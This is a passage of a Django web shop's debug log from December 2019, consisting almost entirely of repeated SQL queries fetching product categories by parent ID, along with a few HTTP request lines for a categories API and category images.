10:29:04,860 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:29:04,864 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:29:04,869 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:29:04,875 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:29:04,879 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:29:04,883 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:29:04,888 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:29:04,892 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:29:04,897 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:29:04,901 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:29:04,904 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:29:04,907 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:29:04,910 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:29:04,915 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:29:04,918 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:29:04,921 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:29:04,924 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:29:04,926 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:29:04,929 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:29:04,933 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:29:04,935 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:29:04,941 utils 4252 140031482124032 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:29:04,945 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:29:04,949 utils 4252 140031482124032 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:29:04,956 utils 4252 140031482124032 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:29:04,959 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:29:04,962 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:29:04,965 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:29:04,969 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:29:04,974 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:29:04,977 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:29:04,981 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:29:04,984 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:29:04,987 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:29:04,990 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:29:04,994 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:29:04,998 utils 4252 140031482124032 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:29:05,002 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:29:05,009 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:29:05,012 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:29:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:29:05] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:29:05] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 10:29:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:31:09,558 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:31:09,566 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:31:09,570 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:31:09,573 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:31:09,577 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:31:09,579 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:31:09,582 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:31:09,584 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:31:09,587 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:31:09,590 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:31:09,593 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:31:09,595 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:31:09,598 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:31:09,600 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:31:09,604 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:31:09,607 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:31:09,609 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:31:09,612 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:31:09,615 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:31:09,619 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:31:09,622 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:31:09,624 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:31:09,627 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:31:09,629 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:31:09,631 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:31:09,635 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:31:09,638 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" 